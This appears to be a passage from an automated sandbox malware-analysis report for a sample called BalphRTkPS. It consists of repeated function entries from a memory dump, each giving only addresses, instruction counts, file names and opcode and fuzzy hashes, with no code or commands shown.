                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 53cd26e53e7d16ab0b39d359e75da08a52af6bb856c459e38d8e9c091abbd565
                                                                                                              • Instruction ID: 7111ecdb8ca8ce08bd7056a6b660a96df40f2d6ec77fe1cdf2d86f4ac66976ca
                                                                                                              • Opcode Fuzzy Hash: 53cd26e53e7d16ab0b39d359e75da08a52af6bb856c459e38d8e9c091abbd565
                                                                                                              • Instruction Fuzzy Hash: EAA1CC72A406169FD762DF18CD84B2ABBE9FF48304F154928F689DB691D334EE00CB91
                                                                                                              Function 017B60E0 Relevance: .3, Instructions: 264COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e2b7c6e8bf27dbc3934245016117a1ec0730b1876f22cd47ee730bccd7004173
                                                                                                              • Instruction ID: a523a6030ad6e77bb762f385853046e46b91744d8c496acee737b97bb2a75b22
                                                                                                              • Opcode Fuzzy Hash: e2b7c6e8bf27dbc3934245016117a1ec0730b1876f22cd47ee730bccd7004173
                                                                                                              • Instruction Fuzzy Hash: B4919E71E0521AAFDB15CFA8D8C4BEEFBB5AB48710F154169FB11AB241D734E9009BA0
                                                                                                              Function 0174E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 12ad3a59a1b3e1e4a44f3ee12de71ac19b78669f6fd18194f071d9f6d0cb86ee
                                                                                                              • Instruction ID: f1d7da1cae80a02c6168199de121c01864480c26f902bfd81bea54c289e5e5cb
                                                                                                              • Opcode Fuzzy Hash: 12ad3a59a1b3e1e4a44f3ee12de71ac19b78669f6fd18194f071d9f6d0cb86ee
                                                                                                              • Instruction Fuzzy Hash: 67911331A00612CBEB25DB6CD884B79FBA1FF94724F2540A9EE059B345FB38D941CB91
                                                                                                              Function 01786ACC Relevance: .2, Instructions: 226COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cb371ad99f037dd2403354b882bd701922bf6b6662b00ef64b1b685b24de08ba
                                                                                                              • Instruction ID: f0b0d61c88f7dded8689e59ab2b5869ff542fa272a84544cbd8ebe0852cd2d1a
                                                                                                              • Opcode Fuzzy Hash: cb371ad99f037dd2403354b882bd701922bf6b6662b00ef64b1b685b24de08ba
                                                                                                              • Instruction Fuzzy Hash: 38818071A00616ABDB25DFA9C840ABEFBF9FB48700F14852EF555E7640E734E940CBA4
                                                                                                              Function 017FAB40 Relevance: .2, Instructions: 222COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                              • Instruction ID: 887fdb5d85dfeb2d46ee3cdf3589d5ad9a9b12f616b5a7004e47a36f6f2491ae
                                                                                                              • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                              • Instruction Fuzzy Hash: 49816131A0020A9FDF19DF98C894AAFFBB6BF84310F14856DDA1A9B385D734E941CB50
                                                                                                              Function 01726D10 Relevance: .2, Instructions: 216COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cdf773070e86b3f38fdb8466ee196d80dd816e4c046b2aace1680f948f0891a8
                                                                                                              • Instruction ID: b2641d511d958177ffce209c86e261251e9623ee9564af40977263497ab643e7
                                                                                                              • Opcode Fuzzy Hash: cdf773070e86b3f38fdb8466ee196d80dd816e4c046b2aace1680f948f0891a8
                                                                                                              • Instruction Fuzzy Hash: 45718671684742ABDB21EF29C980B7AF7E4BB84258F044929FB55D7240E731E984CB92
                                                                                                              Function 0176E284 Relevance: .2, Instructions: 212COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e122d0d639e12cf4a91a7052b326cc970223d8e54406092da15223cef09188ad
                                                                                                              • Instruction ID: 42a5de9d5759987f98b9c51aa290335c1444bf105276d659e3a3c44fc4c17ec7
                                                                                                              • Opcode Fuzzy Hash: e122d0d639e12cf4a91a7052b326cc970223d8e54406092da15223cef09188ad
                                                                                                              • Instruction Fuzzy Hash: CA816275900609AFDB25CFA9C880BEEFBFAFF88354F144429E955A7250DB30AC55CB60
                                                                                                              Function 0174C640 Relevance: .2, Instructions: 206COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6d0530de05d9504f8aeb32c1ab81c4f216001e9ffdde4dad8e0cc2d732917c2e
                                                                                                              • Instruction ID: 904b30e11ca02d192384cafc9819e4025121b3e6e21394a4248aca4871b22869
                                                                                                              • Opcode Fuzzy Hash: 6d0530de05d9504f8aeb32c1ab81c4f216001e9ffdde4dad8e0cc2d732917c2e
                                                                                                              • Instruction Fuzzy Hash: F771ED75D01229DBCB26CF58D8907BEFBB0FF5A710F14819AE942AB350E3309944CBA1
                                                                                                              Function 017C8D6B Relevance: .2, Instructions: 206COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4b4087d3fac73063c55ec54d8c88196c1c1149e30b49feb59697fd95ed62a0b1
                                                                                                              • Instruction ID: 706bbbb7285dc97ce491e4c0b518bf5f22e379ed3e6938bded7d30aeee80b634
                                                                                                              • Opcode Fuzzy Hash: 4b4087d3fac73063c55ec54d8c88196c1c1149e30b49feb59697fd95ed62a0b1
                                                                                                              • Instruction Fuzzy Hash: 8871C0709042669FCB15CF59C844AFAFBF5EF49700F0480ADE994DB202E335EA45CBA1
                                                                                                              Function 0174260B Relevance: .2, Instructions: 201COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3c25db4125b2f2793808937b638486216ceba0510dd474001050205330fd27e6
                                                                                                              • Instruction ID: b8a384852c24a06ab51ecb7802003ff60ade48da010a15cf1c398c53483d2d4e
                                                                                                              • Opcode Fuzzy Hash: 3c25db4125b2f2793808937b638486216ceba0510dd474001050205330fd27e6
                                                                                                              • Instruction Fuzzy Hash: 3F71BD316046428FD712DF28D484B2AF7E5FF88310F0485AAF899CB756DB34D956CBA2
                                                                                                              Function 017B035C Relevance: .2, Instructions: 198COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                              • Instruction ID: 3f53e1252f3d3d031fd6ef4f9e65b5579e243ad87d8373dadf89dc58bd90e6a6
                                                                                                              • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                              • Instruction Fuzzy Hash: 22714D71A0061AAFDB10DFA9C988FEEFBB9FF48700F104569E505A7294DB34EA41CB50
                                                                                                              Function 017C62A0 Relevance: .2, Instructions: 198COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2031173d9945cb16472c5961adc050e0f7dc88683ac3c284da33262217ae8fae
                                                                                                              • Instruction ID: 2dfd153313324c6ef133808881cfb8e747c24b9dd980566c3515e3e286b0319c
                                                                                                              • Opcode Fuzzy Hash: 2031173d9945cb16472c5961adc050e0f7dc88683ac3c284da33262217ae8fae
                                                                                                              • Instruction Fuzzy Hash: C071C332240701AFEB329F18C884F66FBA6EF44B60F15492CF6558B3A1D775EA44CB50
                                                                                                              Function 01738AA0 Relevance: .2, Instructions: 197COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 439d15392287697dee9d07df26c4c4b07ac20d4737a5b52cbbf3b49095e0190d
                                                                                                              • Instruction ID: b83cb229360f365a660c83368fe916f13d9e7d804cc7ee86a4fcbeb266523814
                                                                                                              • Opcode Fuzzy Hash: 439d15392287697dee9d07df26c4c4b07ac20d4737a5b52cbbf3b49095e0190d
                                                                                                              • Instruction Fuzzy Hash: DA81A371A083569FDF29DF58E484B6DFBB1BF88310F164269E9006B286C7749E44CBA4
                                                                                                              Function 0175EDD3 Relevance: .2, Instructions: 166COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ca852065825a87f781c390a4e4dfec32de5f450680b947b33f359f4e60a2c1aa
                                                                                                              • Instruction ID: 68dd7974c43737ec2f29a3be2f966b2f37dd2006572f104983b647003068c5b3
                                                                                                              • Opcode Fuzzy Hash: ca852065825a87f781c390a4e4dfec32de5f450680b947b33f359f4e60a2c1aa
                                                                                                              • Instruction Fuzzy Hash: 2351BC71200741DFEB71DF59D888B2AFBE9BB48609F10486DE50287A52DBB4EA44CB90
                                                                                                              Function 0175CDF0 Relevance: .2, Instructions: 165COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                                                                                                              • Instruction ID: 205c548550a9c3963efb6a084e0051f4b035a8ae6eeeff451b4ab0dacbc0413d
                                                                                                              • Opcode Fuzzy Hash: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                                                                                                              • Instruction Fuzzy Hash: 55519071E0068ADFCF14CF9CD9806EDFBB5FB49210F188169D956BB300DA74AA45CB54
                                                                                                              Function 0176E443 Relevance: .2, Instructions: 158COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 08f598de1d7a321aeef7b46565a50dcddc7774dcf92299a9819a35c80e197eee
                                                                                                              • Instruction ID: c36ee21f9105be32b80675b0db853494405e38f91eeec4e1b84bd4ad875cfb85
                                                                                                              • Opcode Fuzzy Hash: 08f598de1d7a321aeef7b46565a50dcddc7774dcf92299a9819a35c80e197eee
                                                                                                              • Instruction Fuzzy Hash: 90518C71200A15DFCB22EF69C984E6AF7FDFF54744F500869EA1597261EB30E940CB60
                                                                                                              Function 017D4180 Relevance: .2, Instructions: 156COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 890194c88e1c5d310d6297083acea854abcb5a4a7a11ac39125c7560c9937e9d
                                                                                                              • Instruction ID: 676f6f36199f5e3a3a06abbb574c44a72ff9291e32b89b95ca81267614427dca
                                                                                                              • Opcode Fuzzy Hash: 890194c88e1c5d310d6297083acea854abcb5a4a7a11ac39125c7560c9937e9d
                                                                                                              • Instruction Fuzzy Hash: 1D51337160834A9FD754DF2DC880A6BFBF5BBC8208F444A2DF58AD7650EB30D9058B92
                                                                                                              Function 017545B1 Relevance: .2, Instructions: 156COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                              • Instruction ID: 3cecf17eaebe755858a09f9571d7c0498a9107cbc1c5d16f9c33e5958cfc3d28
                                                                                                              • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                              • Instruction Fuzzy Hash: 4E518271E0021AABDF55DF94D844BEEFBB5EF45754F044069EA02AB240E7B4ED84CBA0
                                                                                                              Function 017BE9E0 Relevance: .2, Instructions: 154COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                              • Instruction ID: c0cc1a764d0a1214e51b7ce51583357717972ea9cd6c583f1556ac8c1e9aa039
                                                                                                              • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                              • Instruction Fuzzy Hash: EE518471D0021AEFEF219A94C8D4FEFFBB9AF00324F154669D91267391DB309E408BA1
                                                                                                              Function 017F8B28 Relevance: .2, Instructions: 152COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 792a5e350bceccee45e4181680742eb1fc67244abccf8fcc28a9e69d4fbcad75
                                                                                                              • Instruction ID: c203f2240322f6f77fb7cf40f9a77ab7f43ea8581ff878fbf5c54c1a0aa8e5c7
                                                                                                              • Opcode Fuzzy Hash: 792a5e350bceccee45e4181680742eb1fc67244abccf8fcc28a9e69d4fbcad75
                                                                                                              • Instruction Fuzzy Hash: 8441F5707016159BD729DB2DC895B7BFB9AFF90220F08825DEB558B384DB30D801C692
                                                                                                              Function 017BCBF0 Relevance: .1, Instructions: 148COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 78950458b4bbadc8c4c05acd2e9fb2fd72514c4d5c26883df1add9aac233ca6b
                                                                                                              • Instruction ID: 1796e34eef9b946138a458430219b35ab3c4b6008450c16a1c26bbe51fc0c26c
                                                                                                              • Opcode Fuzzy Hash: 78950458b4bbadc8c4c05acd2e9fb2fd72514c4d5c26883df1add9aac233ca6b
                                                                                                              • Instruction Fuzzy Hash: 91517C75A00216DFCB32DFA9C9C4AAEFBB9FF58214B208519D905A7305D730AA41CF90
                                                                                                              Function 0176A430 Relevance: .1, Instructions: 139COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a10bce9f954a789e02d78efb55e719a3c58791c38685baef9002d67fb66bad7f
                                                                                                              • Instruction ID: de69c72793acc9a266029daea020e17d212fcdf5f6e9761aed01ce85a3918a14
                                                                                                              • Opcode Fuzzy Hash: a10bce9f954a789e02d78efb55e719a3c58791c38685baef9002d67fb66bad7f
                                                                                                              • Instruction Fuzzy Hash: E1412971B402129BCB36EF68D884B2AF768EB55308F44506CFE16AB246D771D940CB50
                                                                                                              Function 017FA9D3 Relevance: .1, Instructions: 139COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                              • Instruction ID: 9459a83afb682e64d73cfc15f30608205da25432fcc872f39ca9c5b6495faaac
                                                                                                              • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                              • Instruction Fuzzy Hash: 9C41C671A047169FD725CF28C984A6BF7A9FF80210B05466EEA5A87744EB31ED1CCBD0
                                                                                                              Function 017601F8 Relevance: .1, Instructions: 138COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 37fa935ca5848955fc40fec60d5c1e157b1bc86c0625ffedbb174a6835f7864f
                                                                                                              • Instruction ID: 6812baf7ee0c44e593c7da881594e9a935a578976878562ff5f749fed42786ea
                                                                                                              • Opcode Fuzzy Hash: 37fa935ca5848955fc40fec60d5c1e157b1bc86c0625ffedbb174a6835f7864f
                                                                                                              • Instruction Fuzzy Hash: 82419B369012199BDB15DFA9C440AEEFBB8BF88710F14826AF815F7240D7359D41CBA4
                                                                                                              Function 0175EBFC Relevance: .1, Instructions: 138COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6b759beed37d65764002c670d924f1ee06c5733d0447c78974c5a57b5b373c96
                                                                                                              • Instruction ID: ba6332b080da21c430442d01b7f88a24d0d6e8fabc30f1d0ce6808cf4caa4fb9
                                                                                                              • Opcode Fuzzy Hash: 6b759beed37d65764002c670d924f1ee06c5733d0447c78974c5a57b5b373c96
                                                                                                              • Instruction Fuzzy Hash: 7541D4712043019FDB65DF28D884A2BFBE5FF88214F10486EE957C7616EB71E9888B90
                                                                                                              Function 01772750 Relevance: .1, Instructions: 137COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                              • Instruction ID: b40c45aa9bcdf6bd0df30164d21a3db50637f4e34838f34721f6e49e40576992
                                                                                                              • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                              • Instruction Fuzzy Hash: 85515A75A00215CFDB15CF9CC580AAEF7B2FF88710F6882A9D915A7351D770AE82CB90
                                                                                                              Function 01736154 Relevance: .1, Instructions: 133COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 76dbd48f09678ef4f96813132613366b79cbc953ed3a2e9e707c391c00c1f348
                                                                                                              • Instruction ID: 00f3bcc28dc182d5d61b38ab25a828b2e8237f47dcdede3dd4aeba5ef3c42bcc
                                                                                                              • Opcode Fuzzy Hash: 76dbd48f09678ef4f96813132613366b79cbc953ed3a2e9e707c391c00c1f348
                                                                                                              • Instruction Fuzzy Hash: B6511770904256EBDB36DB28CC08BE8FBB5FF55314F1482A5E529972C6E7749A81CF80
                                                                                                              Function 01730BCD Relevance: .1, Instructions: 130COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5dcdd50720516e4477ed4b719d8d5ba23bdbc1a2a1d4f7acaa57b80510f375ed
                                                                                                              • Instruction ID: 1d924153c62bd4446d4f5a0dae78887e4df418b6c1a344e7d4192e31a7b1ca29
                                                                                                              • Opcode Fuzzy Hash: 5dcdd50720516e4477ed4b719d8d5ba23bdbc1a2a1d4f7acaa57b80510f375ed
                                                                                                              • Instruction Fuzzy Hash: 44417535A402299BDF21EF68C944BEAF7B4EF45750F0100A5E909AB242DB749E84CF95
                                                                                                              Function 01730D59 Relevance: .1, Instructions: 130COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f3c1f61e73cdd16934967a74c0377e3159e53f2af376633948763ef73b9b346f
                                                                                                              • Instruction ID: 7bb9c9dab9526693c473f469c5d6d6238b0a1fe60aef20c349772844a7b6c05b
                                                                                                              • Opcode Fuzzy Hash: f3c1f61e73cdd16934967a74c0377e3159e53f2af376633948763ef73b9b346f
                                                                                                              • Instruction Fuzzy Hash: 4941A571740318DFEB32EF28CC84B6AF7A9AB99714F0044A9F94597286D7B0ED40CB61
                                                                                                              Function 017F866E Relevance: .1, Instructions: 129COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
